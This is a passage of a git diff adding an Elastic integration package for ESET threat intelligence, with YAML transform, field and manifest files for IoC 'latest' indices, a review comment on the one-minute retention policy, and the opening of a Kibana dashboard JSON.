+ - alias: logs-ti_eset_latest.domains
+ move_on_creation: true
+frequency: 30s
+latest:
+ sort: '@timestamp'
+ unique_key:
+ - event.dataset
+ - eset.id
+retention_policy:
+ time:
+ field: eset.valid_until
+ max_age: 1m
+source:
+ index:
+ - logs-ti_eset.domains-*
+sync:
+ time:
+ delay: 120s
+ field: event.ingested
diff --git a/packages/ti_eset/elasticsearch/transform/files_latest_ioc/fields/agent.yml b/packages/ti_eset/elasticsearch/transform/files_latest_ioc/fields/agent.yml
new file mode 100644
index 00000000000..845b84ed9c0
--- /dev/null
+++ b/packages/ti_eset/elasticsearch/transform/files_latest_ioc/fields/agent.yml
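Review bot: `retention_policy` removes a document from the latest index once `eset.valid_until` is more than `max_age: 1m` in the past, evaluated on each `frequency: 30s` checkpoint, so an indicator vanishes from `logs-ti_eset_latest.domains` about a minute after it expires; that is the right direction for a TI latest index (stale IoCs otherwise keep producing matches), but the tight window reads like a placeholder, so a comment stating it is deliberate would help: `# Drop indicators as soon as eset.valid_until has passed; source data streams keep the history.` As far as I can tell from the transform docs, documents with no `eset.valid_until` are never matched by the retention query and remain in the destination index indefinitely, so it is worth confirming the pipeline always sets that field or documenting the consequence. The same configuration is repeated in the files_latest_ioc, ip_latest_ioc and url_latest_ioc transform.yml files.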
@@ -0,0 +1,201 @@
+- name: cloud
+ title: Cloud
+ group: 2
+ description: Fields related to the cloud or infrastructure the events are coming from.
+ footnote: 'Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on.'
+ type: group
+ fields:
+ - name: account.id
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: 'The cloud account or organization id used to identify different entities in a multi-tenant environment.
+
+ Examples: AWS account id, Google Cloud ORG Id, or other unique identifier.'
+ example: 666777888999
+ - name: availability_zone
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Availability zone in which this host is running.
+ example: us-east-1c
+ - name: instance.id
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Instance ID of the host machine.
+ example: i-1234567890abcdef0
+ - name: instance.name
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Instance name of the host machine.
+ - name: machine.type
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Machine type of the host machine.
+ example: t2.medium
+ - name: provider
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean.
+ example: aws
+ - name: region
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Region in which this host is running.
+ example: us-east-1
+ - name: project.id
+ type: keyword
+ description: Name of the project in Google Cloud.
+ - name: image.id
+ type: keyword
+ description: Image ID for the cloud instance.
+- name: container
+ title: Container
+ group: 2
+ description: 'Container fields are used for meta information about the specific container that is the source of information.
+
+ These fields help correlate data based containers from any runtime.'
+ type: group
+ fields:
+ - name: id
+ level: core
+ type: keyword
+ ignore_above: 1024
+ description: Unique container id.
+ - name: image.name
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Name of the image the container was built on.
+ - name: labels
+ level: extended
+ type: object
+ object_type: keyword
+ description: Image labels.
+ - name: name
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Container name.
+- name: host
+ title: Host
+ group: 2
+ description: 'A host is defined as a general computing instance.
+
+ ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes.'
+ type: group
+ fields:
+ - name: architecture
+ level: core
+ type: keyword
+ ignore_above: 1024
+ description: Operating system architecture.
+ example: x86_64
+ - name: domain
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: 'Name of the domain of which the host is a member.
+
+ For example, on Windows this could be the host''s Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host''s LDAP provider.'
+ example: CONTOSO
+ default_field: false
+ - name: hostname
+ level: core
+ type: keyword
+ ignore_above: 1024
+ description: 'Hostname of the host.
+
+ It normally contains what the `hostname` command returns on the host machine.'
+ - name: id
+ level: core
+ type: keyword
+ ignore_above: 1024
+ description: 'Unique host id.
+
+ As hostname is not always unique, use values that are meaningful in your environment.
+
+ Example: The current usage of `beat.name`.'
+ - name: ip
+ level: core
+ type: ip
+ description: Host ip addresses.
+ - name: mac
+ level: core
+ type: keyword
+ ignore_above: 1024
+ description: Host mac addresses.
+ - name: name
+ level: core
+ type: keyword
+ ignore_above: 1024
+ description: 'Name of the host.
+
+ It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use.'
+ - name: os.family
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: OS family (such as redhat, debian, freebsd, windows).
+ example: debian
+ - name: os.kernel
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Operating system kernel version as a raw string.
+ example: 4.4.0-112-generic
+ - name: os.name
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ multi_fields:
+ - name: text
+ type: text
+ norms: false
+ default_field: false
+ description: Operating system name, without the version.
+ example: Mac OS X
+ - name: os.platform
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Operating system platform (such centos, ubuntu, windows).
+ example: darwin
+ - name: os.version
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Operating system version as a raw string.
+ example: 10.14.1
+ - name: type
+ level: core
+ type: keyword
+ ignore_above: 1024
+ description: 'Type of host.
+
+ For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment.'
+ - name: containerized
+ type: boolean
+ description: >
+ If the host is a container.
+
+ - name: os.build
+ type: keyword
+ example: "18D109"
+ description: >
+ OS build information.
+
+ - name: os.codename
+ type: keyword
+ example: "stretch"
+ description: >
+ OS codename, if any.
+
+- name: input.type
+ type: keyword
+ description: Input type.
diff --git a/packages/ti_eset/elasticsearch/transform/files_latest_ioc/fields/base-fields.yml b/packages/ti_eset/elasticsearch/transform/files_latest_ioc/fields/base-fields.yml
new file mode 100644
index 00000000000..7c798f4534c
--- /dev/null
+++ b/packages/ti_eset/elasticsearch/transform/files_latest_ioc/fields/base-fields.yml
@@ -0,0 +1,12 @@
+- name: data_stream.type
+ type: constant_keyword
+ description: Data stream type.
+- name: data_stream.dataset
+ type: constant_keyword
+ description: Data stream dataset.
+- name: data_stream.namespace
+ type: constant_keyword
+ description: Data stream namespace.
+- name: '@timestamp'
+ type: date
+ description: Event timestamp.
diff --git a/packages/ti_eset/elasticsearch/transform/files_latest_ioc/fields/ecs.yml b/packages/ti_eset/elasticsearch/transform/files_latest_ioc/fields/ecs.yml
new file mode 100644
index 00000000000..43534883f1c
--- /dev/null
+++ b/packages/ti_eset/elasticsearch/transform/files_latest_ioc/fields/ecs.yml
@@ -0,0 +1,42 @@
+- external: ecs
+ name: ecs.version
+- external: ecs
+ name: message
+- external: ecs
+ name: error.message
+- external: ecs
+ name: event.category
+- external: ecs
+ name: event.ingested
+- external: ecs
+ name: event.kind
+- external: ecs
+ name: event.original
+- external: ecs
+ name: event.created
+- external: ecs
+ name: tags
+- external: ecs
+ name: threat.indicator.name
+- external: ecs
+ name: threat.indicator.confidence
+- external: ecs
+ name: threat.indicator.provider
+- external: ecs
+ name: threat.indicator.url.original
+- external: ecs
+ name: threat.indicator.file.hash.md5
+- external: ecs
+ name: threat.indicator.file.hash.sha1
+- external: ecs
+ name: threat.indicator.file.hash.sha256
+- external: ecs
+ name: threat.indicator.type
+- external: ecs
+ name: threat.indicator.description
+- external: ecs
+ name: threat.indicator.modified_at
+- external: ecs
+ name: threat.indicator.last_seen
+- external: ecs
+ name: threat.feed.name
diff --git a/packages/ti_eset/elasticsearch/transform/files_latest_ioc/fields/fields.yml b/packages/ti_eset/elasticsearch/transform/files_latest_ioc/fields/fields.yml
new file mode 100644
index 00000000000..18accf0bda4
--- /dev/null
+++ b/packages/ti_eset/elasticsearch/transform/files_latest_ioc/fields/fields.yml
@@ -0,0 +1,17 @@
+- name: eset
+ type: group
+ description: >
+ Fields for ESET Threat Intelligence
+
+ fields:
+ - name: id
+ type: keyword
+ description: The UID of the event object.
+ - name: valid_until
+ type: date
+ description: >-
+ Event expiration date.
+ - name: labels
+ type: keyword
+ description: >-
+ Threat labels.
diff --git a/packages/ti_eset/elasticsearch/transform/files_latest_ioc/manifest.yml b/packages/ti_eset/elasticsearch/transform/files_latest_ioc/manifest.yml
new file mode 100644
index 00000000000..f9e3e588fd4
--- /dev/null
+++ b/packages/ti_eset/elasticsearch/transform/files_latest_ioc/manifest.yml
@@ -0,0 +1,18 @@
+destination_index_template:
+ mappings:
+ date_detection: false
+ dynamic: true
+ dynamic_templates:
+ - strings_as_keyword:
+ mapping:
+ ignore_above: 1024
+ type: keyword
+ match_mapping_type: string
+ settings:
+ index:
+ sort:
+ field:
+ - '@timestamp'
+ order:
+ - desc
+start: true
diff --git a/packages/ti_eset/elasticsearch/transform/files_latest_ioc/transform.yml b/packages/ti_eset/elasticsearch/transform/files_latest_ioc/transform.yml
new file mode 100644
index 00000000000..05625c91bb5
--- /dev/null
+++ b/packages/ti_eset/elasticsearch/transform/files_latest_ioc/transform.yml
@@ -0,0 +1,26 @@
+_meta:
+ fleet_transform_version: 0.1.0
+ managed: true
+description: Latest ESET Files IoC data
+dest:
+ index: logs-ti_eset_latest.dest_files-1
+ aliases:
+ - alias: logs-ti_eset_latest.files
+ move_on_creation: true
+frequency: 30s
+latest:
+ sort: '@timestamp'
+ unique_key:
+ - event.dataset
+ - eset.id
+retention_policy:
+ time:
+ field: eset.valid_until
+ max_age: 1m
+source:
+ index:
+ - logs-ti_eset.files-*
+sync:
+ time:
+ delay: 120s
+ field: event.ingested
diff --git a/packages/ti_eset/elasticsearch/transform/ip_latest_ioc/fields/agent.yml b/packages/ti_eset/elasticsearch/transform/ip_latest_ioc/fields/agent.yml
new file mode 100644
index 00000000000..845b84ed9c0
--- /dev/null
+++ b/packages/ti_eset/elasticsearch/transform/ip_latest_ioc/fields/agent.yml
@@ -0,0 +1,201 @@
+- name: cloud
+ title: Cloud
+ group: 2
+ description: Fields related to the cloud or infrastructure the events are coming from.
+ footnote: 'Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on.'
+ type: group
+ fields:
+ - name: account.id
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: 'The cloud account or organization id used to identify different entities in a multi-tenant environment.
+
+ Examples: AWS account id, Google Cloud ORG Id, or other unique identifier.'
+ example: 666777888999
+ - name: availability_zone
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Availability zone in which this host is running.
+ example: us-east-1c
+ - name: instance.id
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Instance ID of the host machine.
+ example: i-1234567890abcdef0
+ - name: instance.name
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Instance name of the host machine.
+ - name: machine.type
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Machine type of the host machine.
+ example: t2.medium
+ - name: provider
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean.
+ example: aws
+ - name: region
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Region in which this host is running.
+ example: us-east-1
+ - name: project.id
+ type: keyword
+ description: Name of the project in Google Cloud.
+ - name: image.id
+ type: keyword
+ description: Image ID for the cloud instance.
+- name: container
+ title: Container
+ group: 2
+ description: 'Container fields are used for meta information about the specific container that is the source of information.
+
+ These fields help correlate data based containers from any runtime.'
+ type: group
+ fields:
+ - name: id
+ level: core
+ type: keyword
+ ignore_above: 1024
+ description: Unique container id.
+ - name: image.name
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Name of the image the container was built on.
+ - name: labels
+ level: extended
+ type: object
+ object_type: keyword
+ description: Image labels.
+ - name: name
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Container name.
+- name: host
+ title: Host
+ group: 2
+ description: 'A host is defined as a general computing instance.
+
+ ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes.'
+ type: group
+ fields:
+ - name: architecture
+ level: core
+ type: keyword
+ ignore_above: 1024
+ description: Operating system architecture.
+ example: x86_64
+ - name: domain
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: 'Name of the domain of which the host is a member.
+
+ For example, on Windows this could be the host''s Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host''s LDAP provider.'
+ example: CONTOSO
+ default_field: false
+ - name: hostname
+ level: core
+ type: keyword
+ ignore_above: 1024
+ description: 'Hostname of the host.
+
+ It normally contains what the `hostname` command returns on the host machine.'
+ - name: id
+ level: core
+ type: keyword
+ ignore_above: 1024
+ description: 'Unique host id.
+
+ As hostname is not always unique, use values that are meaningful in your environment.
+
+ Example: The current usage of `beat.name`.'
+ - name: ip
+ level: core
+ type: ip
+ description: Host ip addresses.
+ - name: mac
+ level: core
+ type: keyword
+ ignore_above: 1024
+ description: Host mac addresses.
+ - name: name
+ level: core
+ type: keyword
+ ignore_above: 1024
+ description: 'Name of the host.
+
+ It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use.'
+ - name: os.family
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: OS family (such as redhat, debian, freebsd, windows).
+ example: debian
+ - name: os.kernel
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Operating system kernel version as a raw string.
+ example: 4.4.0-112-generic
+ - name: os.name
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ multi_fields:
+ - name: text
+ type: text
+ norms: false
+ default_field: false
+ description: Operating system name, without the version.
+ example: Mac OS X
+ - name: os.platform
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Operating system platform (such centos, ubuntu, windows).
+ example: darwin
+ - name: os.version
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Operating system version as a raw string.
+ example: 10.14.1
+ - name: type
+ level: core
+ type: keyword
+ ignore_above: 1024
+ description: 'Type of host.
+
+ For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment.'
+ - name: containerized
+ type: boolean
+ description: >
+ If the host is a container.
+
+ - name: os.build
+ type: keyword
+ example: "18D109"
+ description: >
+ OS build information.
+
+ - name: os.codename
+ type: keyword
+ example: "stretch"
+ description: >
+ OS codename, if any.
+
+- name: input.type
+ type: keyword
+ description: Input type.
diff --git a/packages/ti_eset/elasticsearch/transform/ip_latest_ioc/fields/base-fields.yml b/packages/ti_eset/elasticsearch/transform/ip_latest_ioc/fields/base-fields.yml
new file mode 100644
index 00000000000..7c798f4534c
--- /dev/null
+++ b/packages/ti_eset/elasticsearch/transform/ip_latest_ioc/fields/base-fields.yml
@@ -0,0 +1,12 @@
+- name: data_stream.type
+ type: constant_keyword
+ description: Data stream type.
+- name: data_stream.dataset
+ type: constant_keyword
+ description: Data stream dataset.
+- name: data_stream.namespace
+ type: constant_keyword
+ description: Data stream namespace.
+- name: '@timestamp'
+ type: date
+ description: Event timestamp.
diff --git a/packages/ti_eset/elasticsearch/transform/ip_latest_ioc/fields/ecs.yml b/packages/ti_eset/elasticsearch/transform/ip_latest_ioc/fields/ecs.yml
new file mode 100644
index 00000000000..532e63297da
--- /dev/null
+++ b/packages/ti_eset/elasticsearch/transform/ip_latest_ioc/fields/ecs.yml
@@ -0,0 +1,40 @@
+- external: ecs
+ name: ecs.version
+- external: ecs
+ name: message
+- external: ecs
+ name: error.message
+- external: ecs
+ name: event.category
+- external: ecs
+ name: event.ingested
+- external: ecs
+ name: event.kind
+- external: ecs
+ name: event.original
+- external: ecs
+ name: event.created
+- external: ecs
+ name: tags
+- external: ecs
+ name: threat.indicator.name
+- external: ecs
+ name: threat.indicator.confidence
+- external: ecs
+ name: threat.indicator.provider
+- external: ecs
+ name: threat.indicator.url.original
+- external: ecs
+ name: threat.indicator.type
+- external: ecs
+ name: threat.indicator.description
+- external: ecs
+ name: threat.indicator.modified_at
+- external: ecs
+ name: threat.indicator.last_seen
+- external: ecs
+ name: threat.feed.name
+- external: ecs
+ name: threat.indicator.ip
+- external: ecs
+ name: threat.indicator.port
diff --git a/packages/ti_eset/elasticsearch/transform/ip_latest_ioc/fields/fields.yml b/packages/ti_eset/elasticsearch/transform/ip_latest_ioc/fields/fields.yml
new file mode 100644
index 00000000000..18accf0bda4
--- /dev/null
+++ b/packages/ti_eset/elasticsearch/transform/ip_latest_ioc/fields/fields.yml
@@ -0,0 +1,17 @@
+- name: eset
+ type: group
+ description: >
+ Fields for ESET Threat Intelligence
+
+ fields:
+ - name: id
+ type: keyword
+ description: The UID of the event object.
+ - name: valid_until
+ type: date
+ description: >-
+ Event expiration date.
+ - name: labels
+ type: keyword
+ description: >-
+ Threat labels.
diff --git a/packages/ti_eset/elasticsearch/transform/ip_latest_ioc/manifest.yml b/packages/ti_eset/elasticsearch/transform/ip_latest_ioc/manifest.yml
new file mode 100644
index 00000000000..f9e3e588fd4
--- /dev/null
+++ b/packages/ti_eset/elasticsearch/transform/ip_latest_ioc/manifest.yml
@@ -0,0 +1,18 @@
+destination_index_template:
+ mappings:
+ date_detection: false
+ dynamic: true
+ dynamic_templates:
+ - strings_as_keyword:
+ mapping:
+ ignore_above: 1024
+ type: keyword
+ match_mapping_type: string
+ settings:
+ index:
+ sort:
+ field:
+ - '@timestamp'
+ order:
+ - desc
+start: true
diff --git a/packages/ti_eset/elasticsearch/transform/ip_latest_ioc/transform.yml b/packages/ti_eset/elasticsearch/transform/ip_latest_ioc/transform.yml
new file mode 100644
index 00000000000..47c99f037e5
--- /dev/null
+++ b/packages/ti_eset/elasticsearch/transform/ip_latest_ioc/transform.yml
@@ -0,0 +1,26 @@
+_meta:
+ fleet_transform_version: 0.1.0
+ managed: true
+description: Latest ESET IP IoC data
+dest:
+ index: logs-ti_eset_latest.dest_ip-1
+ aliases:
+ - alias: logs-ti_eset_latest.ip
+ move_on_creation: true
+frequency: 30s
+latest:
+ sort: '@timestamp'
+ unique_key:
+ - event.dataset
+ - eset.id
+retention_policy:
+ time:
+ field: eset.valid_until
+ max_age: 1m
+source:
+ index:
+ - logs-ti_eset.ip-*
+sync:
+ time:
+ delay: 120s
+ field: event.ingested
diff --git a/packages/ti_eset/elasticsearch/transform/url_latest_ioc/fields/agent.yml b/packages/ti_eset/elasticsearch/transform/url_latest_ioc/fields/agent.yml
new file mode 100644
index 00000000000..845b84ed9c0
--- /dev/null
+++ b/packages/ti_eset/elasticsearch/transform/url_latest_ioc/fields/agent.yml
@@ -0,0 +1,201 @@
+- name: cloud
+ title: Cloud
+ group: 2
+ description: Fields related to the cloud or infrastructure the events are coming from.
+ footnote: 'Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on.'
+ type: group
+ fields:
+ - name: account.id
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: 'The cloud account or organization id used to identify different entities in a multi-tenant environment.
+
+ Examples: AWS account id, Google Cloud ORG Id, or other unique identifier.'
+ example: 666777888999
+ - name: availability_zone
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Availability zone in which this host is running.
+ example: us-east-1c
+ - name: instance.id
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Instance ID of the host machine.
+ example: i-1234567890abcdef0
+ - name: instance.name
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Instance name of the host machine.
+ - name: machine.type
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Machine type of the host machine.
+ example: t2.medium
+ - name: provider
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean.
+ example: aws
+ - name: region
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Region in which this host is running.
+ example: us-east-1
+ - name: project.id
+ type: keyword
+ description: Name of the project in Google Cloud.
+ - name: image.id
+ type: keyword
+ description: Image ID for the cloud instance.
+- name: container
+ title: Container
+ group: 2
+ description: 'Container fields are used for meta information about the specific container that is the source of information.
+
+ These fields help correlate data based containers from any runtime.'
+ type: group
+ fields:
+ - name: id
+ level: core
+ type: keyword
+ ignore_above: 1024
+ description: Unique container id.
+ - name: image.name
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Name of the image the container was built on.
+ - name: labels
+ level: extended
+ type: object
+ object_type: keyword
+ description: Image labels.
+ - name: name
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Container name.
+- name: host
+ title: Host
+ group: 2
+ description: 'A host is defined as a general computing instance.
+
+ ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes.'
+ type: group
+ fields:
+ - name: architecture
+ level: core
+ type: keyword
+ ignore_above: 1024
+ description: Operating system architecture.
+ example: x86_64
+ - name: domain
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: 'Name of the domain of which the host is a member.
+
+ For example, on Windows this could be the host''s Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host''s LDAP provider.'
+ example: CONTOSO
+ default_field: false
+ - name: hostname
+ level: core
+ type: keyword
+ ignore_above: 1024
+ description: 'Hostname of the host.
+
+ It normally contains what the `hostname` command returns on the host machine.'
+ - name: id
+ level: core
+ type: keyword
+ ignore_above: 1024
+ description: 'Unique host id.
+
+ As hostname is not always unique, use values that are meaningful in your environment.
+
+ Example: The current usage of `beat.name`.'
+ - name: ip
+ level: core
+ type: ip
+ description: Host ip addresses.
+ - name: mac
+ level: core
+ type: keyword
+ ignore_above: 1024
+ description: Host mac addresses.
+ - name: name
+ level: core
+ type: keyword
+ ignore_above: 1024
+ description: 'Name of the host.
+
+ It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use.'
+ - name: os.family
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: OS family (such as redhat, debian, freebsd, windows).
+ example: debian
+ - name: os.kernel
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Operating system kernel version as a raw string.
+ example: 4.4.0-112-generic
+ - name: os.name
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ multi_fields:
+ - name: text
+ type: text
+ norms: false
+ default_field: false
+ description: Operating system name, without the version.
+ example: Mac OS X
+ - name: os.platform
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Operating system platform (such centos, ubuntu, windows).
+ example: darwin
+ - name: os.version
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Operating system version as a raw string.
+ example: 10.14.1
+ - name: type
+ level: core
+ type: keyword
+ ignore_above: 1024
+ description: 'Type of host.
+
+ For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment.'
+ - name: containerized
+ type: boolean
+ description: >
+ If the host is a container.
+
+ - name: os.build
+ type: keyword
+ example: "18D109"
+ description: >
+ OS build information.
+
+ - name: os.codename
+ type: keyword
+ example: "stretch"
+ description: >
+ OS codename, if any.
+
+- name: input.type
+ type: keyword
+ description: Input type.
diff --git a/packages/ti_eset/elasticsearch/transform/url_latest_ioc/fields/base-fields.yml b/packages/ti_eset/elasticsearch/transform/url_latest_ioc/fields/base-fields.yml
new file mode 100644
index 00000000000..7c798f4534c
--- /dev/null
+++ b/packages/ti_eset/elasticsearch/transform/url_latest_ioc/fields/base-fields.yml
@@ -0,0 +1,12 @@
+- name: data_stream.type
+ type: constant_keyword
+ description: Data stream type.
+- name: data_stream.dataset
+ type: constant_keyword
+ description: Data stream dataset.
+- name: data_stream.namespace
+ type: constant_keyword
+ description: Data stream namespace.
+- name: '@timestamp'
+ type: date
+ description: Event timestamp.
diff --git a/packages/ti_eset/elasticsearch/transform/url_latest_ioc/fields/ecs.yml b/packages/ti_eset/elasticsearch/transform/url_latest_ioc/fields/ecs.yml
new file mode 100644
index 00000000000..d3f9633c4c9
--- /dev/null
+++ b/packages/ti_eset/elasticsearch/transform/url_latest_ioc/fields/ecs.yml
@@ -0,0 +1,36 @@
+- external: ecs
+ name: ecs.version
+- external: ecs
+ name: message
+- external: ecs
+ name: error.message
+- external: ecs
+ name: event.category
+- external: ecs
+ name: event.ingested
+- external: ecs
+ name: event.kind
+- external: ecs
+ name: event.original
+- external: ecs
+ name: event.created
+- external: ecs
+ name: tags
+- external: ecs
+ name: threat.indicator.name
+- external: ecs
+ name: threat.indicator.confidence
+- external: ecs
+ name: threat.indicator.provider
+- external: ecs
+ name: threat.indicator.url.original
+- external: ecs
+ name: threat.indicator.type
+- external: ecs
+ name: threat.indicator.description
+- external: ecs
+ name: threat.indicator.modified_at
+- external: ecs
+ name: threat.indicator.last_seen
+- external: ecs
+ name: threat.feed.name
diff --git a/packages/ti_eset/elasticsearch/transform/url_latest_ioc/fields/fields.yml b/packages/ti_eset/elasticsearch/transform/url_latest_ioc/fields/fields.yml
new file mode 100644
index 00000000000..18accf0bda4
--- /dev/null
+++ b/packages/ti_eset/elasticsearch/transform/url_latest_ioc/fields/fields.yml
@@ -0,0 +1,17 @@
+- name: eset
+ type: group
+ description: >
+ Fields for ESET Threat Intelligence
+
+ fields:
+ - name: id
+ type: keyword
+ description: The UID of the event object.
+ - name: valid_until
+ type: date
+ description: >-
+ Event expiration date.
+ - name: labels
+ type: keyword
+ description: >-
+ Threat labels.
diff --git a/packages/ti_eset/elasticsearch/transform/url_latest_ioc/manifest.yml b/packages/ti_eset/elasticsearch/transform/url_latest_ioc/manifest.yml
new file mode 100644
index 00000000000..f9e3e588fd4
--- /dev/null
+++ b/packages/ti_eset/elasticsearch/transform/url_latest_ioc/manifest.yml
@@ -0,0 +1,18 @@
+destination_index_template:
+ mappings:
+ date_detection: false
+ dynamic: true
+ dynamic_templates:
+ - strings_as_keyword:
+ mapping:
+ ignore_above: 1024
+ type: keyword
+ match_mapping_type: string
+ settings:
+ index:
+ sort:
+ field:
+ - '@timestamp'
+ order:
+ - desc
+start: true
diff --git a/packages/ti_eset/elasticsearch/transform/url_latest_ioc/transform.yml b/packages/ti_eset/elasticsearch/transform/url_latest_ioc/transform.yml
new file mode 100644
index 00000000000..57ff6f12d31
--- /dev/null
+++ b/packages/ti_eset/elasticsearch/transform/url_latest_ioc/transform.yml
@@ -0,0 +1,26 @@
+_meta:
+ fleet_transform_version: 0.1.0
+ managed: true
+description: Latest ESET URL IoC data
+dest:
+ index: logs-ti_eset_latest.dest_url-1
+ aliases:
+ - alias: logs-ti_eset_latest.url
+ move_on_creation: true
+frequency: 30s
+latest:
+ sort: '@timestamp'
+ unique_key:
+ - event.dataset
+ - eset.id
+retention_policy:
+ time:
+ field: eset.valid_until
+ max_age: 1m
+source:
+ index:
+ - logs-ti_eset.url-*
+sync:
+ time:
+ delay: 120s
+ field: event.ingested
diff --git a/packages/ti_eset/img/eset-lozenge-color-rgb.svg b/packages/ti_eset/img/eset-lozenge-color-rgb.svg
new file mode 100644
index 00000000000..e49ac59aa79
--- /dev/null
+++ b/packages/ti_eset/img/eset-lozenge-color-rgb.svg
@@ -0,0 +1 @@
+
\ No newline at end of file
diff --git a/packages/ti_eset/img/files.png b/packages/ti_eset/img/files.png
new file mode 100644
index 00000000000..0973685f6d5
Binary files /dev/null and b/packages/ti_eset/img/files.png differ
diff --git a/packages/ti_eset/img/overview.png b/packages/ti_eset/img/overview.png
new file mode 100644
index 00000000000..b5a728c97eb
Binary files /dev/null and b/packages/ti_eset/img/overview.png differ
diff --git a/packages/ti_eset/img/url-ip.png b/packages/ti_eset/img/url-ip.png
new file mode 100644
index 00000000000..7c839e49bad
Binary files /dev/null and b/packages/ti_eset/img/url-ip.png differ
diff --git a/packages/ti_eset/kibana/dashboard/ti_eset-402bf6b0-8194-11ee-a704-a3364df0a052.json b/packages/ti_eset/kibana/dashboard/ti_eset-402bf6b0-8194-11ee-a704-a3364df0a052.json
new file mode 100644
index 00000000000..b3b724c17fc
--- /dev/null
+++ b/packages/ti_eset/kibana/dashboard/ti_eset-402bf6b0-8194-11ee-a704-a3364df0a052.json
@@ -0,0 +1,1273 @@ +{ + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "oneLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"91dfea82-e7ea-473c-adfa-45623e39ba59\":{\"type\":\"optionsListControl\",\"order\":0,\"grow\":true,\"width\":\"large\",\"explicitInput\":{\"id\":\"91dfea82-e7ea-473c-adfa-45623e39ba59\",\"fieldName\":\"data_stream.dataset\",\"title\":\"Feed name\",\"grow\":true,\"width\":\"large\",\"selectedOptions\":[],\"enhancements\":{}}}}" + }, + "description": "Dashboard displaying detailed domain, URL and IP data.", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "negate": false, + "params": [ + { + "meta": { + "alias": null, + "disabled": false, + "field": "_index", + "index": "logs-*", + "key": "_index", + "negate": false, + "params": { + "query": "logs-ti_eset_latest.*" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "_index": "logs-ti_eset_latest.*" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "logs-*", + "key": "event.kind", + "negate": false, + "params": { + "query": 